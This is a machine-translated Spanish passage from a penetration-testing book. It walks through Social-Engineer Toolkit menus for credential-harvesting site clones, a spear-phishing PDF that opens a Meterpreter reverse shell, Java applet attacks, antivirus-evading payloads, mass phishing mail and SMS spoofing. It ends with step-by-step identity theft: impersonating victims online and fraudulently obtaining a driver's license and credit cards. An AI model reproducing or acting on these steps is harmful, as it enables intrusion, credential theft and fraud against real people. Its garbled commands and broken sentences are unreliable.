Para protegerse contra los ataques de ingeniería social, un empleado debe estar al tanto
de los ataques que están ocurriendo actualmente en el mundo de la ingeniería social y las
contramedidas para evitarlos.

[ dieciséis ]
Capítulo 1

Capacitación
La formación de concienciación de los empleados juega un papel muy importante en el reconocimiento del
esquema de ataque de ingeniería social y cómo responder de manera eficaz. Todos los empleados deben
Ser consciente de las técnicas comunes que utilizan los ingenieros sociales para obtener la información
deseada, como la forma en que El ingeniero primero intenta construir una sólida confianza
relación, y así sucesivamente.

Sistema de respuesta a incidentes


Debe haber un sistema adecuado para detectar e investigar los ataques de
ingeniería social.

Clasificación de la información
La información debe clasificarse como confidencial, discreta y de alto secreto.
En consecuencia, las autorizaciones deben asignarse a quien esté disponible en función
del nivel de permiso.

Políticas de contraseña
Las contraseñas juegan un papel muy importante en el entorno de TI actual. Debe haber
pautas sobre cómo administrar las contraseñas. El administrador de la red, los
administradores de la base de datos y el resto del personal deben seguir estas pautas.

Asimismo, se podrían incorporar las siguientes comprobaciones de validación:

• Longitud y complejidad de las contraseñas.

• Permitir al usuario intentar volver a iniciar sesión en caso de un intento fallido de inicio de sesión.

• Bloqueo de cuenta después de un número determinado de intentos fallidos.

• Cambio periódico de contraseña.


• Los servidores proxy empresariales con medidas anti-malware y anti-phishing pueden ayudar.
Por ejemplo, herramientas como la puerta de enlace de aplicaciones web IronPort de Cisco y
muchas otras.

[17]
Introducción a los ataques de ingeniería social

Resumen
En este capítulo hemos cubierto qué son los ataques de ingeniería social y los diferentes tipos de
ataques (basados en humanos y basados en computadoras). También aprendimos cómo, a través del
lado del cliente, podemos atacar y entrar en un entorno muy seguro simplemente haciendo que el
objetivo haga clic en un enlace de phishing o espejo. Discutimos las diversas contramedidas contra
ataques que una organización puede aplicar para mantenerse a salvo de este tipo de ataques.

En el próximo capítulo, cubriremos cómo utilizar la vulnerabilidad a nivel de


aplicación para aplicaciones como navegadores y Flash y cómo proteger el entorno
de estos ataques.

[18]
Entendiendo el sitio web
Vectores de ataque

Este capítulo le muestra cómo hacer algunas cosas que en muchas situaciones pueden ser
ilegales, poco éticas, una violación de los términos de servicio o simplemente no ser una
buena idea. Se proporciona aquí para brindarle información que puede utilizar para
protegerse contra amenazas y hacer que su propio sistema sea más seguro. Antes de seguir
estas instrucciones, asegúrese de estar en el lado correcto de la línea legal y ética ... ¡use sus
poderes para siempre!

En este capítulo, cubriremos diferentes ataques que se pueden realizar en la capa de


aplicación para comprometer un sistema. Los temas tratados en este capítulo se utilizarán
cuando decida que quiere probar la seguridad de una organización contra ataques de
ingeniería social. Dichos ataques brindan información y pautas cruciales para ayudar a
formular nuevas políticas y procedimientos. También muestran si los empleados están
siguiendo las políticas y procedimientos establecidos por la organización.

En este capítulo se tratarán los siguientes temas:

• Web jacking
• Spear-phishing
• Ataques de subprogramas de Java
Comprensión de los vectores de ataque al sitio web

Phishing y piratería de correo electrónico: ataque


Credential Harvester
Vamos a discutir dos métodos de ataque que aparecen bajo
Ataque de ingeniería social en SET:

• Ataque Web Jacking


• Vector de ataque de spear-phishing

Actualización de su kit de herramientas de ingeniería social


Antes de realizar cualquier ataque, se sugiere que actualice su Kit de herramientas de ingeniería social.
Offensive Security ha creado un repositorio de última generación Kali que contiene compilaciones
diarias para varias herramientas útiles y que se actualizan con frecuencia. El enlace
al repositorio es http://www.kali.org/kali-monday/bleeding-edge-kalirepositories/.

En el Nuestra solución sección de esta página web, se menciona el comando para agregar el.
Este comando debe ejecutarse en uno de los shells de Kali Linux:

echo deb http://repo.kali.org/kali kali-sangrado-borde principal >> / etc / apt / sources.list

apt-get update
actualización de apt-get

Una vez realizado el procedimiento anterior, SET, junto con otras herramientas de ataque de
ingeniería social, se actualizarán automáticamente.

Ahora profundicemos en más detalles sobre cómo realizar los dos ataques mencionados
anteriormente.

Web jacking
Método de ataque de secuestro web fue presentado por white_sheep, Emgent y el
equipo Backtrack. Este método funciona haciendo un clon del sitio web y enviando ese
enlace malicioso al objetivo indicando que el sitio web original se ha movido. Cuando se
hace clic en la URL resaltada, aparece una ventana. Este método utiliza
reemplazo de iframe para que el enlace URL resaltado parezca legítimo.

Ataque Web Jacking viene bajo Ataques de ingeniería social:

[20]
Capitulo 2

Vería una lista de vectores; Seleccione2) Vectores de ataque al sitio web para pasar al siguiente
menú:

Establecer: ataque web> 2

Al usuario se le presentará el siguiente menú. Una vez que se ha seleccionado el tipo de ataque,
el evaluador de seguridad debe seleccionar2 ya que estaremos reflejando el sitio web
conjunto: webattack> 2:

[21]
Comprensión de los vectores de ataque al sitio web

El atacante debe ingresar la dirección IP de la máquina atacante y la dirección del sitio web, por
ejemplo, https://example.com. A partir de entonces, el servidor comenzará a escuchar en la
máquina atacante, como se muestra en la siguiente captura de pantalla:

Una vez que el objetivo haga clic en el contenido malicioso, el servidor responderá. Pero la
pregunta principal es cómo nos damos cuenta de que el objetivo ha hecho clic en el
¿Enlace? Hay varios sitios web en los que se ha utilizado el servicio "acortar su URL"
previsto. Como atacante, tenemos que ocultar el contenido malicioso detrás de algunas historias, como
en LinkedIn, que interesan al usuario en función de la investigación que realizamos.

Algunos de los sitios web para acortar su URL son los siguientes:

• https://bitly.com/: Esto ofrece un servicio de redirección de URL con seguimiento de enlaces


en tiempo real.

• tinyurl.com/: Con TinyURL, puede hacer una URL más pequeña para que funcione
en cualquier página de su sitio.
• 1url.com/: Este es un servicio gratuito de redireccionamiento y acortamiento de URL.

• http://cli.gs/: Esto proporciona URL personalizables, así como seguimiento y redirección


de URL. Algunas otras características únicas incluyen estados privados, en tiempo real y
muy detallados, así como URL de orientación geográfica según el país del visitante.

Una vez que, como atacante, puede presentar algunas ofertas maravillosas, como hacer llamadas
gratuitas o algo similar, el objetivo puede hacer clic en el enlace. Una vez que el objetivo haga clic
en el enlace, el servidor de puerta trasera en la máquina atacante registrará el clic. Esto se
muestra en la siguiente captura de pantalla:

[22]
Capitulo 2

Después de esto, el objetivo se enfrentará a un mensaje en el navegador web de que este sitio
web se ha movido y se proporcionará un enlace malicioso, como se muestra en la siguiente
captura de pantalla:

Una vez que el objetivo hace clic en el enlace malicioso con un mensaje de que este sitio web ha sido
movido, se le presentará el sitio web clonado (inicio de sesión real) y podemos iniciar sesión
en cualquier sitio web como Gmail, LinkedIn o Facebook, como se muestra en la siguiente captura de
pantalla:

[21]
Comprensión de los vectores de ataque al sitio web

A continuación, se redirigirán las credenciales de inicio de sesión detalladas, como se muestra en la


siguiente captura de pantalla:

Resultado final de Web Jacking Attack

Vector de ataque de spear-phishing


Como probador de penetración, el La primera fase que generalmente llevamos a cabo es la información
recolección o la fase de reconocimiento, donde reunimos una enorme cantidad de
información, como la dirección IP, el rango de direcciones IP, los números de teléfono, la dirección de la oficina
y la dirección de correo electrónico oficial de una persona importante en la organización.

Una vez en la fase de ataque, mientras intentamos explotar toda la información que hemos recopilado
en la fase inicial de recopilación de información, también se verifica la seguridad de la dirección de
correo electrónico para ver si nuestros empleados están al tanto de tales ataques o si necesitamos
hacer algo. sobre eso.

Muchos ciberataques han utilizado los ataques de phishing para acceder a las redes más seguras
mediante el simple uso de correos electrónicos. Los ataques de spear-phishing han sido utilizados por
piratas informáticos para atacar a una organización o persona específica.

Un ataque de spear-phishing se considera uno de los ataques de focalización más avanzados, y


también se les llama amenaza persistente avanzada (APT) ataques. Hoy en día, muchos
ciberdelincuentes utilizan APT mediante el uso de malware avanzado. El objetivo de realizar
spear-phishing es obtener acceso a largo plazo a diferentes recursos del objetivo para uso ex-
gubernamental, red militar o satelital. Veamos cómo se pueden realizar los ataques de spear-
phishing:

[24]
Capitulo 2

Seleccionamos opción 1:

Establecer> 1

Debajo Ataques de ingeniería social, Se nos presentará una lista de opciones de


ataque. Una vez que el atacante selecciona la opción del menú para realizar el
ataque de phishing, se le presentarán las siguientes opciones:

[21]
Comprensión de los vectores de ataque al sitio web

El primer ataque (ataque masivo de correo electrónico) se utiliza cuando el atacante quiere enviar correos electrónicos.
a más de una persona, y el último ataque se utiliza para crear nuestra propia plantilla o asunto
del correo. En este ejemplo, cubriremos el segundo ataque,Cree una carga útil de formato
de archivo.

Utilizaremos un escenario de ejemplo de envío de un CV al departamento de RR.HH. de


una empresa en formato PDF malicioso. Una vez que el archivo se abre en el destino
computadora, tendremos su caparazón.

Veamos cómo realizar un ataque masivo de correo electrónico:

Conjunto: phishing> 1

La siguiente captura de pantalla muestra una lista de formatos de archivo (después de escribir 11 en la línea
de comando) que queremos utilizar en una máquina remota como atacante para explotar la máquina. PDF es
el formato predeterminado elegido:

Elegimos la carga útil 11:

[26]
Capitulo 2

Esta carga útil nos ayudará a crear un Archivo PDF vulnerable al software de Adobe:

El atacante tiene que seleccionar una carga útil, es decir, si quiere utilizar la vulnerabilidad de
Adobe Reader o la vulnerabilidad del software Foxit Reader para explotar la máquina. Como
podemos ver en la captura de pantalla anterior, hay dos opciones posibles:

• Podemos utilizar cualquier archivo PDF de nuestro sistema para crear un archivo PDF malicioso para
el ataque
• Posiblemente podamos usar el archivo en blanco predeterminado proporcionado por la carga útil

Estaríamos usando la segunda opción:

Conjunto: cargas útiles> 2

Una vez que el atacante elige el tipo de archivo que quiere usar para el exploit, el atacante
necesita seleccionar posibles cargas útiles. Hay diferentes tipos de cargas útiles:
escalonamiento simple, escalonamiento doble, etc.

Hay una maravillosa documentación de código abierto sobre


seguridad ofensiva en el marco Metasploit en http: // www.
offensive-security.com/metasploit-unleashed/Main_
Página. Aquí, puede obtener información sobre las cargas útiles y el marco de
Metasploit.

[21]
Comprensión de los vectores de ataque al sitio web

Volviendo a nuestro ataque, usaremos el siguiente comando:

Establecer: Carga útil> 2

Las ventanas MeterpreterReverse_TCP payload es un payload de doble escalonamiento que


envía el archivo PDF malicioso en una etapa y presenta al atacante el control remoto
shell de destino en el otro:

Después de seleccionar la opción de carga útil, el atacante debe enviar la dirección IP de la


máquina atacante. En este caso, será la dirección IP de la máquina Kali Linux y el número de
puerto donde el servidor estará escuchando en la máquina atacante.

Una vez que el atacante ingresa la información antes mencionada, lo siguiente que el atacante
necesita especificar es el nombre del archivo. Allí están lossiguientes dos posibles opciones dadas:

• Conserve el nombre del archivo, no me importa: El nombre predeterminado se mantendrá

• Cambie el nombre del archivo, quiero ser genial: El nombre que hemos seleccionado se
mantendrá (MY_CV.pdf en este caso):

[28]
Capitulo 2

A continuación, el atacante debe decidir si desea enviar este correo electrónico malicioso a
uno o varios objetivos. Hemos seleccionado la opción1 para este ejemplo:

Conjunto: suplantación de identidad> 1

Una vez que se ha completado la especificación de destino, lo siguiente que necesita el atacante
especificar es la plantilla. El atacante puede seleccionar una plantilla predeterminada o utilizar
su propia plantilla. Crear su propia plantilla, como una que muestre noticias de un tema actual,
aumenta las posibilidades de realizar un ataque exitoso. En este caso, hemos seleccionado la
plantilla predeterminada:

Conjunto: suplantación de identidad> 7

[21]
Comprensión de los vectores de ataque al sitio web

Esta opción seleccionará el Confirmación del pedido plantilla, como se muestra en la captura de
pantalla anterior y aparece la siguiente pantalla:

Después de especificar la plantilla, el atacante debe ingresar y especificar si


desea enviar un correo electrónico desde una cuenta de Gmail o utilizar su propio servidor de correo electrónico.
La segunda opción tiene más prioridad ya que hay menos posibilidades de que te atrapen.

Por lo tanto, SET enviará el correo electrónico y se le dará la confirmación al atacante:

Una vez que el objetivo abre el correo electrónico y ve el documento PDF, su máquina se
verá comprometida y se abrirá una sesión de Meterpreter inversa al final del atacante.

Meterpreter es una carga útil avanzada. Una vez que el objetivo ejecuta el stager, que es
Por lo general, el archivo vinculado, el núcleo de Meterpreter se inicializa, establece un enlace de red.
sobre el enchufe, y envía un OBTENER llamar a Metasploit en el lado del atacante. Metasploit recibe esto
OBTENER llamar y configurar el cliente, haciendo que el control remoto caparazón del objetivo
accesible para el atacante. Con la ayuda de Meterpreter, el atacante puede realizar
muchas cosas, como cargar un archivo y ejecutar un archivo en la máquina remota.

[30]
Capitulo 2

Ataque de applet de Java


Antes de comenzar con el tema de Java Applet Attack, primero entendamos qué
es un subprograma y cómo funciona.

Un applet se puede describir como un programa Java que se ejecuta en un navegador web.
Básicamente, el concepto de un subprograma de Java proviene del concepto de incrustación dentro
de una página HTML.

Para ver un subprograma, el Entorno de ejecución de Java (JRE) se requiere. La JVM puede ser
un complemento del navegador web o un entorno de ejecución independiente.

Java Applet Attack es el método de ataque más famoso y exitoso para


comprometer un sistema. Fue desarrollado por Thomas Werth, uno de los
desarrolladores de SET.

Java Applet Attack funciona infectando el JRE. Es responsabilidad del JRE ejecutar
el subprograma. Java Applet Attack funciona en plataformas Windows, Linux y
Mac OS.

Escoger 1) Ataques de ingeniería social en el menú para recibir una lista de posibles
ataques que se pueden realizar en Ataques de ingeniería social.

Para realizar un Ataque de applet de Java, Seleccionar opción 2 vectores de ataque al sitio web:

Establecer> 2

Seleccione Vectores de ataque al sitio web para pasar al siguiente menú. El siguiente es
el comando para ver una lista de ataques que se pueden realizar con el método de ataque
del sitio web:

Conjunto: Ataque web> 2

[21]
Comprensión de los vectores de ataque al sitio web

Hay tres opciones proporcionadas por Ataque de applet de Java, como se muestra en la
siguiente captura de pantalla:

Hemos seleccionado 2) Clonador de sitios en este caso:

Una vez que se ha elegido el método, el atacante debe ingresar la IP de la máquina del
atacante, que en este caso es la dirección IP de la máquina Kali.

[32]
Capitulo 2

Para obtener la IP privada del objetivo, es necesario comprender NAT y está funcionando.

NAT representa Traducción de Direcciones de Red, e incluye enmascaramiento de red y


enmascaramiento de IP.

NAT generalmente puede recibir un paquete basado en la solicitud. También generalmente reescribe
el origen o destino del paquete a través del enrutador o firewall. Entonces, para obtener lo privado
Dirección IP del objetivo, hemos creado un túnel SSH para crear una conexión. Esto se trata
en detalle en el próximo capítulo.

Una vez que el atacante ha proporcionado la dirección IP de la máquina atacante y el sitio web
que se va a copiar, lo siguiente que debe seleccionar el atacante es la carga útil:

[21]
Comprensión de los vectores de ataque al sitio web

Seleccionar 2) Windows Reverse_TCPMeterpreter abrirá una conexión inversa de shell hacia la


máquina de ataque una vez que la máquina sea explotada:

Una vez que se ha especificado la carga útil, El atacante debe especificar los complementos para
evitar la seguridad antivirus.

Posteriormente, el atacante debe especificar dónde debe escuchar el puerto del servidor. El puerto
predeterminado es443.

El servidor ha comenzado a escuchar en las máquinas atacantes. Una vez que el objetivo visita
el enlace, se mostrará una ventana emergente en su máquina, como se muestra en la siguiente
captura de pantalla:

[34]
Capitulo 2

Una vez que el objetivo acepta el Ataque de applet de Java certificado, una sesión de Meterpreter
ser creado desde el lado del atacante:

Como se puede ver en la captura de pantalla anterior, se ha abierto el shell de destino.

[21]
Comprensión de los vectores de ataque al sitio web

Defensa contra estos ataques


Los ataques que hemos cubierto en este capítulo se pueden evitar principalmente manteniendo
nuestro navegador web actualizado y no abriendo enlaces ni documentos sospechosos.
También asegúrese de que las contraseñas / credenciales utilizadas se cambien con frecuencia y
retenido en secreto.

Resumen
En este capítulo, hemos cubierto cómo atacar el nivel de aplicación de sistemas remotos a
través de navegadores web y correos electrónicos.

En el próximo capítulo, cubriremos cómo crear una carga útil y un oyente y cómo
enviar SMS falsificados.

[36]
Realización del lado del cliente
Ataques a través de SET
Este capítulo le muestra cómo hacer algunas cosas que en muchas situaciones pueden ser ilegales, poco
éticas, una violación de los términos de servicio o simplemente no ser una buena idea. Se proporciona
aquí para brindarle información que puede utilizar para protegerse contra amenazas y hacer que su
propio sistema sea más seguro. Antes de seguir estas instrucciones, asegúrese de estar en el lado
correcto de la línea legal y ética ... ¡use sus poderes para siempre!

En este capítulo, cubriremos cómo realizar una auditoría de seguridad basada en ataques del lado
del cliente, cómo hacer que el servidor de puerta trasera se ejecute en la máquina atacante y crear
una carga útil y un oyente.

También aprenderemos cómo un atacante puede atacar usando correos electrónicos en grandes redes
empresariales. Los temas cubiertos en este capítulo son los siguientes:

• Creando una carga útil y un oyente


• Comprender el ataque de correo masivo
• Vector de ataque de suplantación de identidad de SMS

Creando una carga útil y un oyente


Antes de comenzar con cómo crear una carga útil, analizaremos algunas palabras clave que a
menudo surgen en la vida cotidiana del personal de seguridad de TI.

Vulnerabilidad
La vulnerabilidad se puede definir como una debilidad o falla en el software de la computadora.
arquitectura o en la implementación que permite a un pirata informático utilizar la debilidad
y comprometer la máquina en función de la vulnerabilidad.
Realización de ataques del lado del cliente a través de SET

Explotar
Un programa o código que permite al atacante poner en peligro una máquina en
función de su vulnerabilidad se denomina exploit.

Carga útil
Este es un programa de software o malware enviado junto con el exploit para que se ejecute
en la máquina vulnerable. Veamos algunos ejemplos de los diferentes tipos de carga útil que
se ofrecen en Metasploit Framework.

Los diferentes tipos de carga útil son los siguientes:

• Individual: Esta carga útil solo realiza una única operación, como transferir
un archivo a máquinas remotas o una estación de trabajo independiente. Por ejemplo:

windows / shell / bind_tcp

• Stagers: Un organizador entrega una parte de la carga útil y, cuando se


establece una conexión, entrega el resto de la carga útil. Por ejemplo:
windows / shell / bind_tcp

• Meterpreter: Se trata de una carga útil multifacética avanzada que funciona a través de
la inyección de DLL que reside completamente en la memoria de la computadora. Por
ejemplo:

Java / shell / reverse_tcp

Pasos para crear una carga útil y un oyente


Los pasos básicos que deben seguirse para crear una carga útil y un oyente son los siguientes:

1. Abra un kit de herramientas SET en su máquina Kali Linux usando los siguientes
comandos:
root @ kali : - # whereis set
set: / usr / share / set
root @ kali : cd / usr / share / set / ./set

Una vez dado este comando, veremos el menú de apertura de SET, como se muestra en la
siguiente captura de pantalla:

[38]
Capítulo 3

2. Seleccione 1) Ataques de ingeniería social para recibir una lista de los posibles ataques que
se incluyen en la ingeniería social. La siguiente captura de pantalla muestra esta lista de
ataques:

[39]
Realización de ataques del lado del cliente a través de SET

3. Comenzaremos con la cuarta opción, Cree una carga útil y un oyente,


para crear el oyente y la carga útil. Para seleccionar esta opción, use el
siguiente comando:
Conjunto: /> 4

4. El siguiente paso para crear la carga útil y el oyente es proporcionar la dirección IP


de la máquina atacante donde se puede realizar la conexión inversa utilizando los
medios de conexión inversa. Una vez que esta máquina es explotada, la carga útil
abrirá un caparazón en la máquina atacante de la máquina objetivo. Ingrese la
dirección IP usando los siguientes comandos:
Establecer> 4: cargas Ingrese la dirección Ip para la carga útil
Establecer> 4 <dirección-ip>

Una vez que el atacante ha terminado de dar la dirección IP para el oyente,


necesitamos comprender los tipos de carga útil, como single, stagers o
Meterpreter. Ya hemos discutido esto en elCarga útil sección.

5. Ahora seleccionaremos Windows Reverse_TCP Meterpreter, donde Meterpreter es una


carga útil multifacética avanzada que opera mediante inyección de DLL. Aquí,
Reverse_TCP significa que está escuchando en un puerto que está esperando que
la conexión se establezca o se cancele. Para seleccionarWindows Reverse_TCP
Meterpreter, use el siguiente comando:

Conjunto: carga útil> 2

[40]
Capítulo 3

Las cargas útiles de Metasploit se han categorizado como etapas, etapas, y individual. La
carga útil única El tipo se selecciona solo cuando el atacante desea realizar una única
operación de ataque. Por ejemplo, si el atacante quiere cargar un malware como
virus.exe en la máquina remota.

La carga útil de los stagers El tipo se selecciona cuando el atacante desea crear una conexión
de red entre el atacante y el objetivo. La carga útil de los Stagers es pequeña y confiable, ya
que no choca la máquina objetivo.

La carga útil de las etapas El tipo utilizado por la carga útil de los stagers tiene algunas características
avanzadas proporcionadas por las etapas. Estas características son Meterpreter, VNC inject y la carcasa
iPhone iPwn.

Una vez que se ha seleccionado la carga útil en función del escenario del objetivo, lo siguiente que
debemos hacer es seleccionar la puerta trasera y el ejecutable para evitar la seguridad antivirus.
Necesitamos especificar el puerto predeterminado donde escuchará el oyente.

Le sugerimos que seleccione el Ejecutable con puerta trasera (MEJOR) payload, ya que generalmente
funciona todo el tiempo.

[41]
Realización de ataques del lado del cliente a través de SET

A continuación, necesitamos especificar en qué puerto específico estará activo nuestro oyente. Si lo hacemos
no especificar, se ejecutará en el puerto predeterminado, como se muestra en la siguiente captura de pantalla:

Como podemos ver en la captura de pantalla anterior, el oyente está activado y el exploit se está
ejecutando en segundo plano.

Comprender el ataque de correo masivo


El próximo ataque que vamos a discutir se llama ataque de correo masivo,
o E-bomba. El nombre en sí es claro; estamos utilizando el mailer para enviar numerosos
correos electrónicos a un solo objetivo o varios objetivos.

El ataque de envío masivo tiene dos variaciones, que se dan de la siguiente manera:

• Ataque de correo electrónico en una sola dirección de correo electrónico

• Ataque de correo electrónico mediante un envío masivo

[42]
Capítulo 3

Amass mailer se usa comúnmente para enviar un enlace de página de phishing al ID de correo electrónico del
objetivo. El atacante debe conocer la técnica de recolección de correo electrónico para ser eficiente.
en este ataque. Hay un script Ruby útil en Kali Linux llamadorompecabezas, que puede ser muy útil
para realizar un ataque recolector de correo electrónico. El script se encuentra aquí:

kali @ root : usr / bin / jigsaw

Un envío masivo también se utiliza para realizar una Denegación de servicio distribuida (DDoS)
ataque mediante la creación de "bots" zombies y controlando los bots a través del
centro de control.

Los pasos necesarios para realizar un ataque de correo masivo son los siguientes:

1. Ataque de correo masivo se encuentra debajo Ataque de ingeniería social.


Ataque de ingeniería socialcontiene la siguiente lista de ataques:

2. Seleccionaremos la quinta opción, Ataque de correo masivo, para realizar un ataque de correo masivo.
Seleccione la opción de la siguiente manera:

Establecer: /> 5

3. Una vez seleccionada la opción, se nos ofrecen las siguientes dos opciones:
° Ataque por correo electrónico Dirección de correo electrónico única

° Ataque por correo electrónico Envío masivo

La Ataque de correo electrónico Dirección de correo electrónico única ataque nos permite enviar un correo
electrónico a un objetivo. LaEnvío masivo de ataques por correo electrónico El ataque nos permite enviar un
correo electrónico a varias personas en una lista.

[43]
Realización de ataques del lado del cliente a través de SET

4. En este ejemplo, cubriremos el segundo ataque, Envío masivo de ataques por correo
electrónico.

5. Necesitamos especificar la ubicación del archivo que contiene la lista de direcciones de correo
electrónico. Puedes ver en la captura de pantalla anterior que he usado el archivocorreos
electrónicos, que se encuentra en /etc / direcciones de correo electrónico. Este archivo contiene
el ID de correo electrónico de destino al que se debe enviar el correo electrónico.

6. Una vez que hemos seleccionado el objetivo, lo siguiente que debemos especificar es la dirección
de correo electrónico desde donde se producirá el ataque.

[44]
Capítulo 3

7. Como puede ver en la captura de pantalla anterior, el ID de correo electrónico del atacante es rpcoder @
gmail.com.La DE El campo especifica con qué nombre debe enviarse el correo electrónico.
ser enviado. Lo siguiente que debemos especificar es la prioridad de este mensaje y si debe
enviarse en texto plano o en formato HTML y también el cuerpo del correo electrónico. El cuerpo
del correo electrónico es muy importante, ya que enviaremos el enlace de correo electrónico de
nuestra página de phishing solicitando al objetivo que visite nuestra página.

8. Una vez que se proporcione toda la información requerida, SET comenzará a enviar los correos electrónicos
secuencialmente como se presenta en la captura de pantalla anterior. Una vez que SET termine
enviando el correo electrónico a todos los destinos, nos pedirá que regresemos a.

Comprender el ataque de suplantación de identidad de SMS

vector
El ataque de suplantación de identidad por SMS permite al atacante enviar un SMS de texto usando SET sin
revelando su verdadera identidad o usando la identidad de otra persona.

[45]
Realización de ataques del lado del cliente a través de SET

Repasemos los pasos necesarios para realizar este ataque:

1. Inicie el juego de herramientas SET. Verá la siguiente pantalla de bienvenida:

2. Vector de ataque de suplantación de SMS está presente bajo Ataques de ingeniería social,
como se muestra en la captura de pantalla anterior. Este módulo en SET fue creado por el
equipo de TB-security.com.

[46]
Capítulo 3

3. El vector de ataque de suplantación de SMS le permite crear sus propios SMS y


envíelos al objetivo utilizando un número de terceros sin interactuar
con el usuario.
4. Desde el Ataques de ingeniería social menú, seleccione el Ataque de suplantación de identidad por SMS
Vector opción. Una vez seleccionado, se nos presentará la siguiente pantalla,
donde debemos decidir la decisión sobre el cuerpo del SMS:

5. Veamos primero cómo podemos crear una plantilla personalizada:

Conjunto: sms> 2

[ **********] Personalizado Generador de plantillas [*********]


Conjunto: sms> Nombre del autor: Rahul
Establecer: sms> Número de teléfono de origen de la plantilla: xxxxx (Número que debe
mostrarse en el lado de destino)

Establecer: sms> Asunto de la plantilla: Devolución de llamada urgente Establecer:


sms> Cuerpo del mensaje: Volver a llamar a este número xxxxx

[47]
Realización de ataques del lado del cliente a través de SET

6. Una vez que hayamos terminado de crear la plantilla, pasaremos por


los pasos para realizar un ataque de suplantación de identidad por SMS. Esto se muestra en la
siguiente captura de pantalla:

7. Como ya hemos aprendido a crear una plantilla personalizada, ahora


realicemos un ataque por SMS:

8. El menú Ataque SMS ofrece dos opciones. Estaremos usando elNúmero de teléfono
único de ataque SMS ataque. El segundo ataqueSMS Ataque SMS masivo, se utiliza
para atacar números telefónicos masivos.
9. Seleccione 1. Número de teléfono único de ataque por SMS ya que queremos enviar un SMS falso
a un solo teléfono celular:

Establecer: sms> Enviar sms a: xxxxx

[48]
Capítulo 3

La plantilla predefinida
La plantilla predefinida incluye el cuerpo del mensaje que debe enviarse junto con el
SMS falsificado. Veamos cómo seleccionar el mensaje de la plantilla y enviarlo al
destino:

1. Desde que seleccionamos Número de teléfono único de ataque SMS, necesitamos dar el
número del objetivo.

2. Tenemos dos opciones con respecto al cuerpo: podemos usar nuestra propia plantilla
o la plantilla predefinida. La plantilla predefinida tiene las siguientes opciones:

3. Una vez que hemos seleccionado la plantilla en función del tema, debemos decidir qué
servicios queremos utilizar. para falsificación de SMS. Los diferentes servicios son
que se muestra en la siguiente captura de pantalla:

[49]
Realización de ataques del lado del cliente a través de SET

4. Una vez que hayamos seleccionado el servicio, SET enviará un SMS y nos dará
una confirmación como se muestra en el siguiente captura de pantalla:

Resumen
Hemos aprendido que para entrar en las redes más seguras, los ataques del lado del
cliente se consideran el método más fácil. Un atacante puede aprovechar mejor
la aplicación no segura desarrollada por el desarrollador, ya que es muy difícil para el desarrollador de
la aplicación buscar todas las fallas de software en la línea de tiempo dada. Por eso,
Debido a la limitación de tiempo, muchas vulnerabilidades no se descubren durante las pruebas.

En este capítulo, cubrimos cómo crear un oyente y una carga útil que se pueden usar para eludir la
seguridad AV de una máquina de destino. También aprendimos cómo realizar un ataque con bomba
electrónica y enviar SMS falsos. En este capítulo, también discutimos los diferentes ataques, que
pueden ayudarnos a verificar la seguridad de cualquier organización en función de su plataforma de
correo electrónico y nivel de aplicación, como atacar el navegador web o los teléfonos celulares.

[50]
Entendiendo lo Social
Ataques de ingeniería
Este capítulo le muestra cómo hacer algunas cosas que en muchas situaciones pueden ser
ilegales, poco éticas, una violación de los términos de servicio o simplemente no ser una
buena idea. Se proporciona aquí para brindarle información que puede utilizar para
protegerse contra amenazas y hacer que su propio sistema sea más seguro. Antes de seguir
estas instrucciones, asegúrese de estar en el lado correcto de la línea legal y ética ... ¡use sus
poderes para siempre!

En este capítulo, veremos algunas de las técnicas utilizadas por el ingeniero social para
engañar a la gente, o en otras palabras, hacer que las tareas se realicen de manera eficiente sin
ser atrapado. Estos tipos de ataques son difíciles de detectar y defender. Hasta ahora hay
no se ha implementado ninguna tecnología o metodología para vigilar la
comunicación humana. Estos tipos de ataques de ingeniería social se realizan sin
siquiera escribir una sola tecla en el teclado de la computadora, por lo que
discutiremos algunas de estas técnicas para que sepa qué debe tener en cuenta
fuera de su computadora. Los temas que se tratarán son:

• El robo de identidad

• Cómo robar una identidad


• Sonsacamiento

• Habilidades de un atacante

• Marco de explotación del navegador


• Marco de ingeniería social
Comprensión de los ataques de ingeniería social

El robo de identidad
El robo de identidad es una forma de ataque de ingeniería social no técnica en la que el
atacante roba la identidad del objetivo utilizando su nombre, sexo, domicilio, número de
seguro social, etc.

Los atacantes roban la identidad social poniendo sus manos en los documentos de
identidad de los objetivos, como su licencia de conducir o tarjeta PAN.

El robo de identidad se puede realizar para cualquiera de los siguientes propósitos:

• Para participar en actividades delictivas, escondiéndose detrás de la identidad del objetivo.

• Para un ataque en línea o una guerra cibernética contra una organización

• Beneficios monetarios de la utilización de los beneficios de la seguridad social.

• Abrir una nueva cuenta bancaria


• Obtener una tarjeta de crédito con el nombre de los objetivos

Robar una identidad


En esta sección discutiremos los aspectos prácticos del robo de identidad. Los pasos que sigue un
atacante para realizar el robo de identidad en línea son:

1. Busque el ID de correo electrónico de destino, por ejemplo, abc@example.com. Esto lo podemos conseguir
fácilmente con la ayuda de Google y algunos trucos de Google, a través de la recolección de Google (el
método utilizado para recopilar las identificaciones de correo electrónico), oa través de LinkedIn.

2. Una vez que tenemos el ID de correo electrónico del objetivo, necesitamos saber más sobre ellos.
Podemos obtener esta información de LinkedIn o Facebook usando las opciones de búsqueda de
correo electrónico.

3. Una vez que obtengamos la identificación de correo electrónico, sus detalles provisionales y la foto, estamos listos para
el rock and roll.

4. Después de eso, necesitamos crear una identificación de correo electrónico similar para
el objetivo y crear una cuenta en línea usando la misma imagen y todos los detalles
que hemos encontrado y comenzar a enviar solicitudes falsas a sus amigos usando
razones como "Perdí mi cuenta anterior", "alguien hackeó mi cuenta" y otras historias
similares.

[52]
Capítulo 4

El siguiente método que vamos a discutir se basa en realizar el robo de identidad en el


mundo real. Los pasos son los siguientes:

1. En primer lugar, necesitamos obtener los documentos de prueba de identidad de los objetivos, como
su licencia de conducir y tarjeta de identificación de votante, o sus documentos de prueba de
domicilio, como facturas de luz o agua.

2. Una vez que obtenga cualquiera de los documentos mencionados anteriormente, por
ejemplo, la factura de luz o agua, vaya a la autoridad de vehículos motorizados con este
documento y reclame haber perdido "su" licencia anterior. Le pedirán documentos de
prueba de domicilio y una foto. Dígales que ha cambiado de dirección.

3. Este es el único documento requerido para hacer una licencia falsa y realizar un robo de
identidad.

4. Una vez finalizados los trámites, se le enviará su nueva licencia a su "nueva"


dirección.
5. Una vez que obtenga la nueva licencia, no le resultará muy difícil abrir una nueva
cuenta y obtenga una tarjeta de crédito emitida a ese nombre.

Sonsacamiento
La provocación es un tipo de ataque en el que preparamos el escenario para el ataque real; por
ejemplo, enviar un correo electrónico malintencionado a una persona en la que ha creado un
